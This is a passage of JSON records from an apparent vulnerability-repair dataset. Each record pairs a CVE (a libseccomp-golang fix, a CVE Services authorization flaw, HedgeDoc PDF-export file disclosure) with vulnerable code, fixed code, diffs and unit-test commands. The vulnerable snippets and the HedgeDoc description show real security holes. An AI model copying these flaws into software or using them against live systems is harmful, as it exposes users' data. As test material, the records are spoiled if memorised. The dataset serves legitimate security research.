["https://github.com/seccomp/libseccomp-golang/commit/06e7a29f36a34b8cf419aeb87b979ee508e58f9e"], "programing_language": "Go", "vul_func": [{"id": "vul_go_216_1", "commit": "fc02980", "file_path": "seccomp_internal.go", "start_line": 242, "end_line": 266, "snippet": "func (f *ScmpFilter) addRuleWrapper(call ScmpSyscall, action ScmpAction, exact bool, cond C.scmp_cast_t) error {\n\tvar length C.uint\n\tif cond != nil {\n\t\tlength = 1\n\t} else {\n\t\tlength = 0\n\t}\n\n\tvar retCode C.int\n\tif exact {\n\t\tretCode = C.seccomp_rule_add_exact_array(f.filterCtx, action.toNative(), C.int(call), length, cond)\n\t} else {\n\t\tretCode = C.seccomp_rule_add_array(f.filterCtx, action.toNative(), C.int(call), length, cond)\n\t}\n\n\tif syscall.Errno(-1*retCode) == syscall.EFAULT {\n\t\treturn fmt.Errorf(\"unrecognized syscall\")\n\t} else if syscall.Errno(-1*retCode) == syscall.EPERM {\n\t\treturn fmt.Errorf(\"requested action matches default action of filter\")\n\t} else if retCode != 0 {\n\t\treturn syscall.Errno(-1 * retCode)\n\t}\n\n\treturn nil\n}"}, {"id": "vul_go_216_2", "commit": "fc02980", "file_path": "seccomp_internal.go", "start_line": 269, "end_line": 301, "snippet": "func (f *ScmpFilter) addRuleGeneric(call ScmpSyscall, action ScmpAction, exact bool, conds []ScmpCondition) error {\n\tf.lock.Lock()\n\tdefer f.lock.Unlock()\n\n\tif !f.valid {\n\t\treturn errBadFilter\n\t}\n\n\tif len(conds) == 0 {\n\t\tif err := f.addRuleWrapper(call, action, exact, nil); err != nil {\n\t\t\treturn err\n\t\t}\n\t} else {\n\t\t// We don't support conditional filtering in library version v2.1\n\t\tif !checkVersionAbove(2, 2, 1) {\n\t\t\treturn VersionError{\n\t\t\t\tmessage: \"conditional filtering is not supported\",\n\t\t\t\tminimum: \"2.2.1\",\n\t\t\t}\n\t\t}\n\n\t\tfor _, cond := range conds {\n\t\t\tcmpStruct := C.make_struct_arg_cmp(C.uint(cond.Argument), cond.Op.toNative(), C.uint64_t(cond.Operand1), C.uint64_t(cond.Operand2))\n\t\t\tdefer C.free(cmpStruct)\n\n\t\t\tif err := f.addRuleWrapper(call, action, exact, C.scmp_cast_t(cmpStruct)); err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\t}\n\t}\n\n\treturn nil\n}"}, {"id": "vul_go_216_3", "commit": "fc02980", "file_path": "seccomp_internal.go", "start_line": 123, "end_line": 139, "snippet": "// Wrapper to create an scmp_arg_cmp struct\nvoid*\nmake_struct_arg_cmp(\n unsigned int arg,\n int compare,\n uint64_t a,\n uint64_t b\n )\n{\n\tstruct scmp_arg_cmp *s = malloc(sizeof(struct scmp_arg_cmp));\n\n\ts->arg = arg;\n\ts->op = compare;\n\ts->datum_a = a;\n\ts->datum_b = b;\n\n\treturn s;"}], "fix_func": [{"id": "fix_go_216_1", "commit": "06e7a29f36a34b8cf419aeb87b979ee508e58f9e", "file_path": "seccomp_internal.go", "start_line": 246, "end_line": 269, "snippet": "func (f *ScmpFilter) addRuleWrapper(call ScmpSyscall, action ScmpAction, exact bool, length C.uint, cond C.scmp_cast_t) error {\n\tif length != 0 && cond == nil {\n\t\treturn fmt.Errorf(\"null conditions list, but length is nonzero\")\n\t}\n\n\tvar retCode C.int\n\tif exact {\n\t\tretCode = C.seccomp_rule_add_exact_array(f.filterCtx, action.toNative(), C.int(call), length, cond)\n\t} else {\n\t\tretCode = C.seccomp_rule_add_array(f.filterCtx, action.toNative(), C.int(call), length, cond)\n\t}\n\n\tif syscall.Errno(-1*retCode) == syscall.EFAULT {\n\t\treturn fmt.Errorf(\"unrecognized syscall\")\n\t} else if syscall.Errno(-1*retCode) == syscall.EPERM {\n\t\treturn fmt.Errorf(\"requested action matches default action of filter\")\n\t} else if syscall.Errno(-1*retCode) == syscall.EINVAL {\n\t\treturn fmt.Errorf(\"two checks on same syscall argument\")\n\t} else if retCode != 0 {\n\t\treturn syscall.Errno(-1 * retCode)\n\t}\n\n\treturn nil\n}"}, {"id": "fix_go_216_2", "commit": "06e7a29f36a34b8cf419aeb87b979ee508e58f9e", "file_path": "seccomp_internal.go", "start_line": 272, "end_line": 311, "snippet": "func (f *ScmpFilter) addRuleGeneric(call ScmpSyscall, action ScmpAction, exact bool, conds []ScmpCondition) error {\n\tf.lock.Lock()\n\tdefer f.lock.Unlock()\n\n\tif !f.valid {\n\t\treturn errBadFilter\n\t}\n\n\tif len(conds) == 0 {\n\t\tif err := f.addRuleWrapper(call, action, exact, 0, nil); err != nil {\n\t\t\treturn err\n\t\t}\n\t} else {\n\t\t// We don't support conditional filtering in library version v2.1\n\t\tif !checkVersionAbove(2, 2, 1) {\n\t\t\treturn VersionError{\n\t\t\t\tmessage: \"conditional filtering is not supported\",\n\t\t\t\tminimum: \"2.2.1\",\n\t\t\t}\n\t\t}\n\n\t\targsArr := C.make_arg_cmp_array(C.uint(len(conds)))\n\t\tif argsArr == nil {\n\t\t\treturn fmt.Errorf(\"error allocating memory for conditions\")\n\t\t}\n\t\tdefer C.free(argsArr)\n\n\t\tfor i, cond := range conds {\n\t\t\tC.add_struct_arg_cmp(C.scmp_cast_t(argsArr), C.uint(i),\n\t\t\t\tC.uint(cond.Argument), cond.Op.toNative(),\n\t\t\t\tC.uint64_t(cond.Operand1), C.uint64_t(cond.Operand2))\n\t\t}\n\n\t\tif err := f.addRuleWrapper(call, action, exact, C.uint(len(conds)), C.scmp_cast_t(argsArr)); err != nil {\n\t\t\treturn err\n\t\t}\n\t}\n\n\treturn nil\n}"}, {"id": "fix_go_216_3", "commit": "06e7a29f36a34b8cf419aeb87b979ee508e58f9e", "file_path": "seccomp_internal.go", "start_line": 123, "end_line": 143, "snippet": "void* make_arg_cmp_array(unsigned int length)\n{\n return calloc(length, sizeof(struct scmp_arg_cmp));\n}\n\n// Wrapper to add an scmp_arg_cmp struct to an existing arg_cmp array\nvoid add_struct_arg_cmp(\n struct scmp_arg_cmp* arr,\n unsigned int pos,\n unsigned int arg,\n int compare,\n uint64_t a,\n uint64_t b\n )\n{\n arr[pos].arg = arg;\n arr[pos].op = compare;\n arr[pos].datum_a = a;\n arr[pos].datum_b = b;\n\n return;"}], "vul_patch": "--- a/seccomp_internal.go\n+++ b/seccomp_internal.go\n@@ -1,9 +1,6 @@\n-func (f *ScmpFilter) addRuleWrapper(call ScmpSyscall, action ScmpAction, exact bool, cond C.scmp_cast_t) error {\n-\tvar length C.uint\n-\tif cond != nil {\n-\t\tlength = 1\n-\t} else {\n-\t\tlength = 0\n+func (f *ScmpFilter) addRuleWrapper(call ScmpSyscall, action ScmpAction, exact bool, length C.uint, cond C.scmp_cast_t) error {\n+\tif length != 0 && cond == nil {\n+\t\treturn fmt.Errorf(\"null conditions list, but length is nonzero\")\n \t}\n \n \tvar retCode C.int\n@@ -17,6 +14,8 @@\n \t\treturn fmt.Errorf(\"unrecognized syscall\")\n \t} else if syscall.Errno(-1*retCode) == syscall.EPERM {\n \t\treturn fmt.Errorf(\"requested action matches default action of filter\")\n+\t} else if syscall.Errno(-1*retCode) == syscall.EINVAL {\n+\t\treturn fmt.Errorf(\"two checks on same syscall argument\")\n \t} else if retCode != 0 {\n \t\treturn syscall.Errno(-1 * retCode)\n \t}\n\n--- a/seccomp_internal.go\n+++ b/seccomp_internal.go\n@@ -7,7 +7,7 @@\n \t}\n \n \tif len(conds) == 0 {\n-\t\tif err := f.addRuleWrapper(call, action, exact, nil); err != nil {\n+\t\tif err := f.addRuleWrapper(call, action, exact, 0, nil); err != nil {\n \t\t\treturn err\n \t\t}\n \t} else {\n@@ -19,13 +19,20 @@\n \t\t\t}\n \t\t}\n \n-\t\tfor _, cond := range conds {\n-\t\t\tcmpStruct := C.make_struct_arg_cmp(C.uint(cond.Argument), cond.Op.toNative(), C.uint64_t(cond.Operand1), C.uint64_t(cond.Operand2))\n-\t\t\tdefer C.free(cmpStruct)\n+\t\targsArr := C.make_arg_cmp_array(C.uint(len(conds)))\n+\t\tif argsArr == nil {\n+\t\t\treturn fmt.Errorf(\"error allocating memory for conditions\")\n+\t\t}\n+\t\tdefer C.free(argsArr)\n \n-\t\t\tif err := f.addRuleWrapper(call, action, exact, C.scmp_cast_t(cmpStruct)); err != nil {\n-\t\t\t\treturn err\n-\t\t\t}\n+\t\tfor i, cond := range conds {\n+\t\t\tC.add_struct_arg_cmp(C.scmp_cast_t(argsArr), C.uint(i),\n+\t\t\t\tC.uint(cond.Argument), cond.Op.toNative(),\n+\t\t\t\tC.uint64_t(cond.Operand1), C.uint64_t(cond.Operand2))\n+\t\t}\n+\n+\t\tif err := f.addRuleWrapper(call, action, exact, C.uint(len(conds)), C.scmp_cast_t(argsArr)); err != nil {\n+\t\t\treturn err\n \t\t}\n \t}\n \n\n--- a/seccomp_internal.go\n+++ b/seccomp_internal.go\n@@ -1,17 +1,21 @@\n-// Wrapper to create an scmp_arg_cmp struct\n-void*\n-make_struct_arg_cmp(\n- unsigned int arg,\n- int compare,\n- uint64_t a,\n- uint64_t b\n- )\n+void* make_arg_cmp_array(unsigned int length)\n {\n-\tstruct scmp_arg_cmp *s = malloc(sizeof(struct scmp_arg_cmp));\n+ return calloc(length, sizeof(struct scmp_arg_cmp));\n+}\n \n-\ts->arg = arg;\n-\ts->op = compare;\n-\ts->datum_a = a;\n-\ts->datum_b = b;\n+// Wrapper to add an scmp_arg_cmp struct to an existing arg_cmp array\n+void add_struct_arg_cmp(\n+ struct scmp_arg_cmp* arr,\n+ unsigned int pos,\n+ unsigned int arg,\n+ int compare,\n+ uint64_t a,\n+ uint64_t b\n+ )\n+{\n+ arr[pos].arg = arg;\n+ arr[pos].op = compare;\n+ arr[pos].datum_a = a;\n+ arr[pos].datum_b = b;\n \n-\treturn s;\n+ return;\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2021-46561", "cve_description": "controller/org.controller/org.controller.js in the CVE Services API 1.1.1 before 5c50baf3bda28133a3bc90b854765a64fb538304 allows an organizational administrator to transfer a user account to an arbitrary new organization, and thereby achieve unintended access within the context of that new organization.", "cwe_info": {"CWE-863": {"name": "Incorrect Authorization", "description": "The product performs an authorization check when an actor attempts to access a resource or perform an action, but it does not correctly perform the check."}}, "repo": "https://github.com/CVEProject/cve-services", "patch_url": ["https://github.com/CVEProject/cve-services/commit/5c50baf3bda28133a3bc90b854765a64fb538304"], "programing_language": "JavaScript", "vul_func": [{"id": "vul_js_52_1", "commit": "7bd7989", "file_path": "src/controller/org.controller/org.controller.js", "start_line": 496, "end_line": 532, "snippet": " Object.keys(req.ctx.query).forEach(k => {\n const key = k.toLowerCase()\n\n if (key === 'new_username') {\n newUser.username = req.ctx.query.new_username\n } else if (key === 'org_shortname') {\n newOrgShortName = req.ctx.query.org_shortname\n changesRequirePrivilegedRole = true\n } else if (key === 'name.first') {\n newUser.name.first = req.ctx.query['name.first']\n } else if (key === 'name.last') {\n newUser.name.last = req.ctx.query['name.last']\n } else if (key === 'name.middle') {\n newUser.name.middle = req.ctx.query['name.middle']\n } else if (key === 'name.suffix') {\n newUser.name.suffix = req.ctx.query['name.suffix']\n } else if (key === 'name.surname') {\n newUser.name.surname = req.ctx.query['name.surname']\n } else if (key === 'active') {\n newUser.active = req.ctx.query.active\n changesRequirePrivilegedRole = true\n } else if (key === 'active_roles.add') {\n if (Array.isArray(req.ctx.query['active_roles.add'])) {\n req.ctx.query['active_roles.add'].forEach(r => {\n addRoles.push(r)\n })\n changesRequirePrivilegedRole = true\n }\n } else if (key === 'active_roles.remove') {\n if (Array.isArray(req.ctx.query['active_roles.remove'])) {\n req.ctx.query['active_roles.remove'].forEach(r => {\n removeRoles.push(r)\n })\n changesRequirePrivilegedRole = true\n }\n }\n })"}], "fix_func": [{"id": "fix_js_52_2", "commit": "5c50baf", "file_path": "src/controller/org.controller/error.js", "start_line": 25, "end_line": 31, "snippet": " notAllowedToChangeOrganization () {\n const err = {}\n err.error = 'NOT_ALLOWED_TO_CHANGE_ORGANIZATION'\n err.message = 'Only the Secretariat can change the organization for a user.'\n return err\n }\n"}, {"id": "fix_js_52_1", "commit": "5c50baf", "file_path": "src/controller/org.controller/org.controller.js", "start_line": 459, "end_line": 628, "snippet": "async function updateUser (req, res, next) {\n try {\n const requesterShortName = req.ctx.org\n const requesterUsername = req.ctx.user\n const username = req.ctx.params.username\n const shortName = req.ctx.params.shortname\n const newUser = new User()\n let newOrgShortName\n let changesRequirePrivilegedRole // Set variable to true if protected fields are being modified\n const removeRoles = []\n const addRoles = []\n const userRepo = req.ctx.repositories.getUserRepository()\n const orgRepo = req.ctx.repositories.getOrgRepository()\n const orgUUID = await orgRepo.getOrgUUID(shortName)\n const isSecretariat = await orgRepo.isSecretariat(requesterShortName)\n const isAdmin = await userRepo.isAdmin(requesterUsername, requesterShortName) // Check if requester is Admin of the designated user's org\n\n if (!orgUUID) {\n logger.info({ uuid: req.ctx.uuid, message: 'The user could not be updated because ' + shortName + ' organization does not exist.' })\n return res.status(404).json(error.orgDneParam(shortName))\n }\n\n const user = await userRepo.findOneByUserNameAndOrgUUID(username, orgUUID)\n if (!user) {\n logger.info({ uuid: req.ctx.uuid, message: 'The user could not be updated because ' + username + ' does not exist for ' + shortName + ' organization.' })\n return res.status(404).json(error.userDne(username))\n }\n\n // check if the user is not the requester or if the requester is not a secretariat\n if ((shortName !== requesterShortName || username !== requesterUsername) && !isSecretariat) {\n // check if the requester is not and admin; if admin, the requester must be from the same org as the user\n if (!isAdmin || (isAdmin && shortName !== requesterShortName)) {\n logger.info({ uuid: req.ctx.uuid, message: 'The user can only be updated by the Secretariat, an Org admin or if the requester is the user.' })\n return res.status(403).json(error.notSameUserOrSecretariat())\n }\n }\n\n Object.keys(req.ctx.query).forEach(k => {\n const key = k.toLowerCase()\n\n if (key === 'new_username') {\n newUser.username = req.ctx.query.new_username\n } else if (key === 'org_shortname') {\n newOrgShortName = req.ctx.query.org_shortname\n changesRequirePrivilegedRole = true\n if (!isSecretariat) {\n logger.info({ uuid: req.ctx.uuid, message: 'The user could not be updated because ' + requesterUsername + ' is an Org Admin and tried to reassign the organization.' })\n return res.status(403).json(error.notAllowedToChangeOrganization())\n }\n } else if (key === 'name.first') {\n newUser.name.first = req.ctx.query['name.first']\n } else if (key === 'name.last') {\n newUser.name.last = req.ctx.query['name.last']\n } else if (key === 'name.middle') {\n newUser.name.middle = req.ctx.query['name.middle']\n } else if (key === 'name.suffix') {\n newUser.name.suffix = req.ctx.query['name.suffix']\n } else if (key === 'name.surname') {\n newUser.name.surname = req.ctx.query['name.surname']\n } else if (key === 'active') {\n newUser.active = req.ctx.query.active\n changesRequirePrivilegedRole = true\n } else if (key === 'active_roles.add') {\n if (Array.isArray(req.ctx.query['active_roles.add'])) {\n req.ctx.query['active_roles.add'].forEach(r => {\n addRoles.push(r)\n })\n changesRequirePrivilegedRole = true\n }\n } else if (key === 'active_roles.remove') {\n if (Array.isArray(req.ctx.query['active_roles.remove'])) {\n req.ctx.query['active_roles.remove'].forEach(r => {\n removeRoles.push(r)\n })\n changesRequirePrivilegedRole = true\n }\n }\n })\n\n // updating user's roles and org_uuid is only allowed for secretariats and org admins\n if (changesRequirePrivilegedRole && !(isAdmin || isSecretariat)) {\n logger.info({ uuid: req.ctx.uuid, message: 'The user could not be updated because ' + requesterUsername + ' user is not Org Admin or Secretariat to modify these fields.' })\n return res.status(403).json(error.notOrgAdminOrSecretariat())\n }\n\n // check if the new org exist\n if (newOrgShortName) {\n newUser.org_UUID = await orgRepo.getOrgUUID(newOrgShortName)\n\n if (!newUser.org_UUID) {\n logger.info({ uuid: req.ctx.uuid, message: 'The user could not be updated because ' + newOrgShortName + ' organization does not exist.' })\n return res.status(404).json(error.orgDne(newOrgShortName))\n }\n }\n\n let agt = setAggregateUserObj({ username: username, org_UUID: orgUUID })\n\n // check if org has user of same username already\n if (newUser.username && newUser.org_UUID) {\n agt = setAggregateUserObj({ username: newUser.username, org_UUID: newUser.org_UUID })\n const duplicateUsers = await userRepo.find({ org_UUID: newUser.org_UUID, username: newUser.username })\n if (duplicateUsers.length) {\n logger.info({ uuid: req.ctx.uuid, message: 'The user could not be updated because ' + newOrgShortName + ' organization contains a user with the same username.' })\n return res.status(403).json(error.duplicateUsername(newOrgShortName, newUser.username))\n }\n } else if (newUser.username) {\n agt = setAggregateUserObj({ username: newUser.username, org_UUID: orgUUID })\n const duplicateUsers = await userRepo.find({ org_UUID: orgUUID, username: newUser.username })\n if (duplicateUsers.length) {\n logger.info({ uuid: req.ctx.uuid, message: 'The user could not be updated because ' + shortName + ' organization contains a user with the same username.' })\n return res.status(403).json(error.duplicateUsername(shortName, newUser.username))\n }\n } else if (newUser.org_UUID) {\n agt = setAggregateUserObj({ username: username, org_UUID: newUser.org_UUID })\n const duplicateUsers = await userRepo.find({ org_UUID: newUser.org_UUID, username: username })\n if (duplicateUsers.length) {\n logger.info({ uuid: req.ctx.uuid, message: 'The user could not be updated because ' + newOrgShortName + ' organization contains a user with the same username.' })\n return res.status(403).json(error.duplicateUsername(newOrgShortName, username))\n }\n }\n\n // updating the user's roles\n const roles = user.authority.active_roles\n\n // adding roles\n addRoles.forEach(role => {\n if (!roles.includes(role)) {\n roles.push(role)\n }\n })\n\n // removing roles\n removeRoles.forEach(role => {\n const index = roles.indexOf(role)\n\n if (index > -1) {\n roles.splice(index, 1)\n }\n })\n\n newUser.authority.active_roles = roles\n\n let result = await userRepo.updateByUserNameAndOrgUUID(username, orgUUID, newUser)\n if (result.n === 0) {\n logger.info({ uuid: req.ctx.uuid, message: 'The user could not be updated because ' + username + ' does not exist for ' + shortName + ' organization.' })\n return res.status(404).json(error.userDne(username))\n }\n\n result = await userRepo.aggregate(agt)\n result = result.length > 0 ? result[0] : null\n\n const responseMessage = {\n message: username + ' was successfully updated.',\n updated: result\n }\n\n const payload = {\n action: 'update_user',\n change: username + ' was successfully updated.',\n req_UUID: req.ctx.uuid,\n org_UUID: await orgRepo.getOrgUUID(req.ctx.org),\n user: result\n }\n payload.user_UUID = await userRepo.getUserUUID(req.ctx.user, payload.org_UUID)\n logger.info(JSON.stringify(payload))\n return res.status(200).json(responseMessage)\n } catch (err) {\n next(err)\n }\n}"}], "vul_patch": "--- a/src/controller/org.controller/org.controller.js\n+++ b/src/controller/org.controller/org.controller.js\n@@ -1,3 +1,40 @@\n+async function updateUser (req, res, next) {\n+ try {\n+ const requesterShortName = req.ctx.org\n+ const requesterUsername = req.ctx.user\n+ const username = req.ctx.params.username\n+ const shortName = req.ctx.params.shortname\n+ const newUser = new User()\n+ let newOrgShortName\n+ let changesRequirePrivilegedRole // Set variable to true if protected fields are being modified\n+ const removeRoles = []\n+ const addRoles = []\n+ const userRepo = req.ctx.repositories.getUserRepository()\n+ const orgRepo = req.ctx.repositories.getOrgRepository()\n+ const orgUUID = await orgRepo.getOrgUUID(shortName)\n+ const isSecretariat = await orgRepo.isSecretariat(requesterShortName)\n+ const isAdmin = await userRepo.isAdmin(requesterUsername, requesterShortName) // Check if requester is Admin of the designated user's org\n+\n+ if (!orgUUID) {\n+ logger.info({ uuid: req.ctx.uuid, message: 'The user could not be updated because ' + shortName + ' organization does not exist.' })\n+ return res.status(404).json(error.orgDneParam(shortName))\n+ }\n+\n+ const user = await userRepo.findOneByUserNameAndOrgUUID(username, orgUUID)\n+ if (!user) {\n+ logger.info({ uuid: req.ctx.uuid, message: 'The user could not be updated because ' + username + ' does not exist for ' + shortName + ' organization.' })\n+ return res.status(404).json(error.userDne(username))\n+ }\n+\n+ // check if the user is not the requester or if the requester is not a secretariat\n+ if ((shortName !== requesterShortName || username !== requesterUsername) && !isSecretariat) {\n+ // check if the requester is not and admin; if admin, the requester must be from the same org as the user\n+ if (!isAdmin || (isAdmin && shortName !== requesterShortName)) {\n+ logger.info({ uuid: req.ctx.uuid, message: 'The user can only be updated by the Secretariat, an Org admin or if the requester is the user.' })\n+ return res.status(403).json(error.notSameUserOrSecretariat())\n+ }\n+ }\n+\n Object.keys(req.ctx.query).forEach(k => {\n const key = k.toLowerCase()\n \n@@ -6,6 +43,10 @@\n } else if (key === 'org_shortname') {\n newOrgShortName = req.ctx.query.org_shortname\n changesRequirePrivilegedRole = true\n+ if (!isSecretariat) {\n+ logger.info({ uuid: req.ctx.uuid, message: 'The user could not be updated because ' + requesterUsername + ' is an Org Admin and tried to reassign the organization.' })\n+ return res.status(403).json(error.notAllowedToChangeOrganization())\n+ }\n } else if (key === 'name.first') {\n newUser.name.first = req.ctx.query['name.first']\n } else if (key === 'name.last') {\n@@ -35,3 +76,95 @@\n }\n }\n })\n+\n+ // updating user's roles and org_uuid is only allowed for secretariats and org admins\n+ if (changesRequirePrivilegedRole && !(isAdmin || isSecretariat)) {\n+ logger.info({ uuid: req.ctx.uuid, message: 'The user could not be updated because ' + requesterUsername + ' user is not Org Admin or Secretariat to modify these fields.' })\n+ return res.status(403).json(error.notOrgAdminOrSecretariat())\n+ }\n+\n+ // check if the new org exist\n+ if (newOrgShortName) {\n+ newUser.org_UUID = await orgRepo.getOrgUUID(newOrgShortName)\n+\n+ if (!newUser.org_UUID) {\n+ logger.info({ uuid: req.ctx.uuid, message: 'The user could not be updated because ' + newOrgShortName + ' organization does not exist.' })\n+ return res.status(404).json(error.orgDne(newOrgShortName))\n+ }\n+ }\n+\n+ let agt = setAggregateUserObj({ username: username, org_UUID: orgUUID })\n+\n+ // check if org has user of same username already\n+ if (newUser.username && newUser.org_UUID) {\n+ agt = setAggregateUserObj({ username: newUser.username, org_UUID: newUser.org_UUID })\n+ const duplicateUsers = await userRepo.find({ org_UUID: newUser.org_UUID, username: newUser.username })\n+ if (duplicateUsers.length) {\n+ logger.info({ uuid: req.ctx.uuid, message: 'The user could not be updated because ' + newOrgShortName + ' organization contains a user with the same username.' })\n+ return res.status(403).json(error.duplicateUsername(newOrgShortName, newUser.username))\n+ }\n+ } else if (newUser.username) {\n+ agt = setAggregateUserObj({ username: newUser.username, org_UUID: orgUUID })\n+ const duplicateUsers = await userRepo.find({ org_UUID: orgUUID, username: newUser.username })\n+ if (duplicateUsers.length) {\n+ logger.info({ uuid: req.ctx.uuid, message: 'The user could not be updated because ' + shortName + ' organization contains a user with the same username.' })\n+ return res.status(403).json(error.duplicateUsername(shortName, newUser.username))\n+ }\n+ } else if (newUser.org_UUID) {\n+ agt = setAggregateUserObj({ username: username, org_UUID: newUser.org_UUID })\n+ const duplicateUsers = await userRepo.find({ org_UUID: newUser.org_UUID, username: username })\n+ if (duplicateUsers.length) {\n+ logger.info({ uuid: req.ctx.uuid, message: 'The user could not be updated because ' + newOrgShortName + ' organization contains a user with the same username.' })\n+ return res.status(403).json(error.duplicateUsername(newOrgShortName, username))\n+ }\n+ }\n+\n+ // updating the user's roles\n+ const roles = user.authority.active_roles\n+\n+ // adding roles\n+ addRoles.forEach(role => {\n+ if (!roles.includes(role)) {\n+ roles.push(role)\n+ }\n+ })\n+\n+ // removing roles\n+ removeRoles.forEach(role => {\n+ const index = roles.indexOf(role)\n+\n+ if (index > -1) {\n+ roles.splice(index, 1)\n+ }\n+ })\n+\n+ newUser.authority.active_roles = roles\n+\n+ let result = await userRepo.updateByUserNameAndOrgUUID(username, orgUUID, newUser)\n+ if (result.n === 0) {\n+ logger.info({ uuid: req.ctx.uuid, message: 'The user could not be updated because ' + username + ' does not exist for ' + shortName + ' organization.' })\n+ return res.status(404).json(error.userDne(username))\n+ }\n+\n+ result = await userRepo.aggregate(agt)\n+ result = result.length > 0 ? result[0] : null\n+\n+ const responseMessage = {\n+ message: username + ' was successfully updated.',\n+ updated: result\n+ }\n+\n+ const payload = {\n+ action: 'update_user',\n+ change: username + ' was successfully updated.',\n+ req_UUID: req.ctx.uuid,\n+ org_UUID: await orgRepo.getOrgUUID(req.ctx.org),\n+ user: result\n+ }\n+ payload.user_UUID = await userRepo.getUserUUID(req.ctx.user, payload.org_UUID)\n+ logger.info(JSON.stringify(payload))\n+ return res.status(200).json(responseMessage)\n+ } catch (err) {\n+ next(err)\n+ }\n+}\n\n--- /dev/null\n+++ b/src/controller/org.controller/org.controller.js\n@@ -0,0 +1,6 @@\n+ notAllowedToChangeOrganization () {\n+ const err = {}\n+ err.error = 'NOT_ALLOWED_TO_CHANGE_ORGANIZATION'\n+ err.message = 'Only the Secretariat can change the organization for a user.'\n+ return err\n+ }\n\n", "poc_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2021-46561:latest\n# bash /workspace/fix-run.sh\nset -e\n\ncd /workspace/cve-services\ngit apply --whitespace=nowarn /workspace/test.patch /workspace/fix.patch\nnpx mocha test/unit-tests/user/userUpdateTest.js --grep \"User is not updated because Org Admin is trying to change organization\"\n", "unit_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2021-46561:latest\n# bash /workspace/unit_test.sh\nset -e\n\ncd /workspace/cve-services\ngit apply --whitespace=nowarn /workspace/fix.patch\nnpx mocha test/unit-tests/user/userUpdateTest.js"} {"cve_id": "CVE-2021-29475", "cve_description": "HedgeDoc (formerly known as CodiMD) is an open-source collaborative markdown editor. An attacker is able to receive arbitrary files from the file system when exporting a note to PDF. Since the code injection has to take place as note content, there fore this exploit requires the attackers ability to modify a note. This will affect all instances, which have pdf export enabled. This issue has been fixed by https://github.com/hedgedoc/hedgedoc/commit/c1789474020a6d668d616464cb2da5e90e123f65 and is available in version 1.5.0. Starting the CodiMD/HedgeDoc instance with `CMD_ALLOW_PDF_EXPORT=false` or set `\"allowPDFExport\": false` in config.json can mitigate this issue for those who cannot upgrade. This exploit works because while PhantomJS doesn't actually render the `file:///` references to the PDF file itself, it still uses them internally, and exfiltration is possible, and easy through JavaScript rendering. The impact is pretty bad, as the attacker is able to read the CodiMD/HedgeDoc `config.json` file as well any other files on the filesystem. Even though the suggested Docker deploy option doesn't have many interesting files itself, the `config.json` still often contains sensitive information, database credentials, and maybe OAuth secrets among other things.", "cwe_info": {"CWE-918": {"name": "Server-Side Request Forgery (SSRF)", "description": "The web server receives a URL or similar request from an upstream component and retrieves the contents of this URL, but it does not sufficiently ensure that the request is being sent to the expected destination."}}, "repo": "https://github.com/hedgedoc/hedgedoc", "patch_url": ["https://github.com/hedgedoc/hedgedoc/commit/c1789474020a6d668d616464cb2da5e90e123f65"], "programing_language": "JavaScript", "vul_func": [{"id": "vul_js_293_1", "commit": "e574ae7588ef2981799ddefe3684809e27411204", "file_path": "lib/config/index.js", "start_line": 1, "end_line": 209, "snippet": "\n'use strict'\n\nconst crypto = require('crypto')\nconst fs = require('fs')\nconst path = require('path')\nconst { merge } = require('lodash')\nconst deepFreeze = require('deep-freeze')\nconst { Environment, Permission } = require('./enum')\nconst logger = require('../logger')\nconst { getGitCommit, getGitHubURL } = require('./utils')\n\nconst appRootPath = path.resolve(__dirname, '../../')\nconst env = process.env.NODE_ENV || Environment.development\nconst debugConfig = {\n debug: (env === Environment.development)\n}\n\n// Get version string from package.json\nconst { version, repository } = require(path.join(appRootPath, 'package.json'))\n\nconst commitID = getGitCommit(appRootPath)\nconst sourceURL = getGitHubURL(repository.url, commitID || version)\nconst fullversion = commitID ? `${version}-${commitID}` : version\n\nconst packageConfig = {\n version: version,\n minimumCompatibleVersion: '0.5.0',\n fullversion: fullversion,\n sourceURL: sourceURL\n}\n\nconst configFilePath = path.resolve(appRootPath, process.env.CMD_CONFIG_FILE ||\n'config.json')\nconst fileConfig = fs.existsSync(configFilePath) ? require(configFilePath)[env] : undefined\n\nlet config = require('./default')\nmerge(config, require('./defaultSSL'))\nmerge(config, require('./oldDefault'))\nmerge(config, debugConfig)\nmerge(config, packageConfig)\nmerge(config, fileConfig)\nmerge(config, require('./oldEnvironment'))\nmerge(config, require('./hackmdEnvironment'))\nmerge(config, require('./environment'))\nmerge(config, require('./dockerSecret'))\n\nif (['debug', 'verbose', 'info', 'warn', 'error'].includes(config.loglevel)) {\n logger.level = config.loglevel\n} else {\n logger.error('Selected loglevel %s doesn\\'t exist, using default level \\'debug\\'. Available options: debug, verbose, info, warn, error', config.loglevel)\n}\n\n// load LDAP CA\nif (config.ldap.tlsca) {\n let ca = config.ldap.tlsca.split(',')\n let caContent = []\n for (let i of ca) {\n if (fs.existsSync(i)) {\n caContent.push(fs.readFileSync(i, 'utf8'))\n }\n }\n let tlsOptions = {\n ca: caContent\n }\n config.ldap.tlsOptions = config.ldap.tlsOptions ? Object.assign(config.ldap.tlsOptions, tlsOptions) : tlsOptions\n}\n\n// Permission\nconfig.permission = Permission\nif (!config.allowAnonymous && !config.allowAnonymousEdits) {\n delete config.permission.freely\n}\nif (!(config.defaultPermission in config.permission)) {\n config.defaultPermission = config.permission.editable\n}\n\n// cache result, cannot change config in runtime!!!\nconfig.isStandardHTTPsPort = (function isStandardHTTPsPort () {\n return config.useSSL && config.port === 443\n})()\nconfig.isStandardHTTPPort = (function isStandardHTTPPort () {\n return !config.useSSL && config.port === 80\n})()\n\n// cache serverURL\nconfig.serverURL = (function getserverurl () {\n var url = ''\n if (config.domain) {\n var protocol = config.protocolUseSSL ? 'https://' : 'http://'\n url = protocol + config.domain\n if (config.urlAddPort) {\n if (!config.isStandardHTTPPort || !config.isStandardHTTPsPort) {\n url += ':' + config.port\n }\n }\n }\n if (config.urlPath) {\n url += '/' + config.urlPath\n }\n return url\n})()\n\nif (config.serverURL === '') {\n logger.warn('Neither \\'domain\\' nor \\'CMD_DOMAIN\\' is configured. This can cause issues with various components.\\nHint: Make sure \\'protocolUseSSL\\' and \\'urlAddPort\\' or \\'CMD_PROTOCOL_USESSL\\' and \\'CMD_URL_ADDPORT\\' are configured properly.')\n}\n\nconfig.Environment = Environment\n\n// auth method\nconfig.isFacebookEnable = 